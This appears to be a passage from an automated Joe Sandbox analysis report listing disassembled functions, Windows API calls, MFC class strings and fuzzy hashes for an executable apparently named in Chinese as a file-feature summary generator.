                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$Resource$ActiveEnable$EnabledFindH_prologHookLoadLockUnhookWindows
                                    • String ID:
                                    • API String ID: 401145483-0
                                    • Opcode ID: 7ee4d44cd478f37651b083675d3a67ebd4a6ce63556e7ca6870621659aea832f
                                    • Instruction ID: 099d29b2a617709e34e576c3bec1c38262f4b9fda674ba44a6343ca5e27ea6f5
                                    • Opcode Fuzzy Hash: 7ee4d44cd478f37651b083675d3a67ebd4a6ce63556e7ca6870621659aea832f
                                    • Instruction Fuzzy Hash: A341BE30D00604EBCB21AB69CC45AAFBBB5EF88715F10016FE506A2291EB799D41CB7D
                                    Function 0042CB20 Relevance: 12.9, APIs: 8, Instructions: 865COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: wsprintf
                                    • String ID:
                                    • API String ID: 2111968516-0
                                    • Opcode ID: 3cc8303d9c0b2da8ef1b465b5ac39fc9e1971b3d1463f2587146489e217abde3
                                    • Instruction ID: 5e0aa42a305c906cdfdf45c81aef29299b8113573d44750213990bcc0427a42d
                                    • Opcode Fuzzy Hash: 3cc8303d9c0b2da8ef1b465b5ac39fc9e1971b3d1463f2587146489e217abde3
                                    • Instruction Fuzzy Hash: C362D371B043119FD724DF25E880B6FB7E5AFC5318F54492EE88A97341DB38E8058B9A
                                    Function 004BCF09 Relevance: 12.1, APIs: 8, Instructions: 72stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004BCF0E
                                    • GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?), ref: 004BCF2C
                                    • lstrcpyn.KERNEL32(?,?,00000104), ref: 004BCF3B
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004BCF6F
                                    • CharUpperA.USER32(?), ref: 004BCF80
                                    • FindFirstFileA.KERNEL32(?,?), ref: 004BCF96
                                    • FindClose.KERNEL32(00000000), ref: 004BCFA2
                                    • lstrcpy.KERNEL32(?,?), ref: 004BCFB2
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Find$CharCloseFileFirstFullH_prologInformationNamePathUpperVolumelstrcpylstrcpyn
                                    • String ID:
                                    • API String ID: 304730633-0
                                    • Opcode ID: ab8fe3b05ce3e2c1520c56ff373905d7cd6e849965183c7ed21f404da1f39662
                                    • Instruction ID: 6d489353f00fc286b2f419a927c4974f029f5376da39763447c9774335aca43c
                                    • Opcode Fuzzy Hash: ab8fe3b05ce3e2c1520c56ff373905d7cd6e849965183c7ed21f404da1f39662
                                    • Instruction Fuzzy Hash: F4217831900019BACB109FA5DC88EEFBF7DEF09764F00416AF819E21A0C7388A45CBA4
                                    Function 0041D290 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114filewindowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004BC228: InterlockedIncrement.KERNEL32(-000000F4), ref: 004BC23D
                                    • FindFirstFileA.KERNEL32(?,?,*.*), ref: 0041D32A
                                      • Part of subcall function 004B9825: __EH_prolog.LIBCMT ref: 004B982A
                                      • Part of subcall function 004BC4B3: InterlockedDecrement.KERNEL32 ref: 004BC4C7
                                    • SendMessageA.USER32 ref: 0041D3D0
                                    • FindNextFileA.KERNEL32(?,00000010), ref: 0041D3DC
                                    • FindClose.KERNEL32(?), ref: 0041D3EF
                                    • SendMessageA.USER32(?,00001102,00000002,?), ref: 0041D401
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Find$FileInterlockedMessageSend$CloseDecrementFirstH_prologIncrementNext
                                    • String ID: *.*
                                    • API String ID: 2486832813-438819550
                                    • Opcode ID: e180d1b8cf44e7d89929ee93b10e560846ea1109bdef9d4eedc6711de0d9e341
                                    • Instruction ID: 263135029c80566dbc8d0e13695211a3324c1c9bff9d877f597de71889518e27
                                    • Opcode Fuzzy Hash: e180d1b8cf44e7d89929ee93b10e560846ea1109bdef9d4eedc6711de0d9e341
                                    • Instruction Fuzzy Hash: C84192B1504345ABC310DF65CC81FEBB7E8BB84714F00491EF9A583290EB78E904CB66
                                    Function 004BEAF7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: wsprintf$ClassInfo
                                    • String ID: Afx:%x:%x$Afx:%x:%x:%x:%x:%x
                                    • API String ID: 845911565-79760390
                                    • Opcode ID: 3d3163c70ec9e2d5b18857a7fa963f8d6c7db1aebf4b57d55346d88e14b94b2b
                                    • Instruction ID: d5ff54e9d27c398d2ce7c129265375da3ebdf1d2244de130377acf911183bc18
                                    • Opcode Fuzzy Hash: 3d3163c70ec9e2d5b18857a7fa963f8d6c7db1aebf4b57d55346d88e14b94b2b
                                    • Instruction Fuzzy Hash: 4C21FC71901209AB9F50DF9ADC81DEF7BB8FE98754B00402AF905A2241D7349A519BB9
                                    Function 004B672C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 207timeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004B1DB4: RtlInitializeCriticalSection.NTDLL(00000000), ref: 004B1DF1
                                      • Part of subcall function 004B1DB4: RtlEnterCriticalSection.NTDLL(?), ref: 004B1E0C
                                      • Part of subcall function 004B1E15: RtlLeaveCriticalSection.NTDLL ref: 004B1E22
                                    • GetTimeZoneInformation.KERNEL32(0000000C,?,?,?,0000000B,0000000B,?,004B671D,004B6316,?,00000000,?,?,004AD02E,?,?), ref: 004B677A
                                    • WideCharToMultiByte.KERNEL32(00000220,006148F4,000000FF,0000003F,00000000,?,?,004B671D,004B6316,?,00000000,?,?,004AD02E,?,?), ref: 004B6810
                                    • WideCharToMultiByte.KERNEL32(00000220,00614948,000000FF,0000003F,00000000,?,?,004B671D,004B6316,?,00000000,?,?,004AD02E,?,?), ref: 004B6849
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CriticalSection$ByteCharMultiWide$EnterInformationInitializeLeaveTimeZone
                                    • String ID: <.]
                                    • API String ID: 3442286286-3438141827
                                    • Opcode ID: 4e53ed035e6fe4db62bb413b9967af770cbc67fad550f25f64bded44bb6ebb5f
                                    • Instruction ID: be34a6cc37878a6766a53a41076f187ae9116dd609c98f9ac59cab5cfb3ab2af
                                    • Opcode Fuzzy Hash: 4e53ed035e6fe4db62bb413b9967af770cbc67fad550f25f64bded44bb6ebb5f
                                    • Instruction Fuzzy Hash: C6612BB04051419FDB31AF29EC41BA63FEAFB62314F19012FE095872A1D77C4846E76E
                                    Function 0042E630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClassInfoA.USER32(?,WTWindow,00000000), ref: 0042E658
                                    • LoadCursorA.USER32(00000000,00007F00), ref: 0042E669
                                    • GetStockObject.GDI32(00000005), ref: 0042E673
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ClassCursorInfoLoadObjectStock
                                    • String ID: WTWindow
                                    • API String ID: 1762135420-3503404378
                                    • Opcode ID: 6adaf1f8adf85eb175fbe6acc33c7eb00d382c1d9563ec511b6d853a4276c666
                                    • Instruction ID: f4ba6682dfd8f5ad4cba96e07761c65ad9692d3cbbad70b45517f9e3123342ae
                                    • Opcode Fuzzy Hash: 6adaf1f8adf85eb175fbe6acc33c7eb00d382c1d9563ec511b6d853a4276c666
                                    • Instruction Fuzzy Hash: 8D117CB1A09311AFC350DF57AC84A5BFBE8FB98754F84083EF88893210D73899448B5A
                                    Function 004C0306 Relevance: 6.5, Strings: 5, Instructions: 226COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: AfxControlBar42s$AfxFrameOrView42s$AfxMDIFrame42s$AfxOleControl42s$AfxWnd42s
                                    • API String ID: 0-1092042744
                                    • Opcode ID: fb5b2faf3c2fcfd18b5ce3b7ac760a4fe2275387eaba7b73f1f5d903facf6f83
                                    • Instruction ID: 1da97fe84944b0a8e945f8e8d7c9e16e454fa52b0d9c3da1dacc9da900fe8439
                                    • Opcode Fuzzy Hash: fb5b2faf3c2fcfd18b5ce3b7ac760a4fe2275387eaba7b73f1f5d903facf6f83
                                    • Instruction Fuzzy Hash: 0A81237AD00259AEDBA0DF95C585FDEBFE8AB04344F10816EF904E6181D7788A44CB98
                                    Function 0042B020 Relevance: 6.1, APIs: 4, Instructions: 94fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindNextFileA.KERNEL32(?,?), ref: 0042B072
                                    • FindClose.KERNEL32 ref: 0042B081
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0042B08D
                                    • FindClose.KERNEL32(00000000), ref: 0042B0EB
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Find$CloseFile$FirstNext
                                    • String ID:
                                    • API String ID: 1164774033-0
                                    • Opcode ID: 5cdbea6ef84060144afec20f40a73e13199665e1d8441fddcb221526cdc6777c
                                    • Instruction ID: adb7949c462eb89cf48e75d5b2c342d4e3f05df1d5ce6b8b1a625b256016cbdd
                                    • Opcode Fuzzy Hash: 5cdbea6ef84060144afec20f40a73e13199665e1d8441fddcb221526cdc6777c
                                    • Instruction Fuzzy Hash: FD21E8327047358BD3338A25A8447BBB394EB85724F95462ADD3587390EB3DDC4582CA
                                    Function 004ACF60 Relevance: 4.6, APIs: 3, Instructions: 75timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocalTime.KERNEL32(?), ref: 004ACF6D
                                    • GetSystemTime.KERNEL32(?), ref: 004ACF77
                                    • GetTimeZoneInformation.KERNEL32(?), ref: 004ACFCC
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Time$InformationLocalSystemZone
                                    • String ID:
                                    • API String ID: 2475273158-0
                                    • Opcode ID: aed284b3cc6979be57d832161101ed1755b0523e8b550270f5995699088938c3
                                    • Instruction ID: 21692d648d8bd6a54fe17b39514a695996ccb0f0eab3cee525ef4427b06728cd
                                    • Opcode Fuzzy Hash: aed284b3cc6979be57d832161101ed1755b0523e8b550270f5995699088938c3
                                    • Instruction Fuzzy Hash: CF21B07A900009E9CFA0AF98D844AFF77BAAB16715F444513F810E25E4E7388D82D7A8
                                    Function 004336B0 Relevance: 4.5, APIs: 3, Instructions: 49keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyState.USER32(00000011), ref: 004336E1
                                    • GetKeyState.USER32(00000010), ref: 004336F6
                                    • GetKeyState.USER32(00000012), ref: 0043370B
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
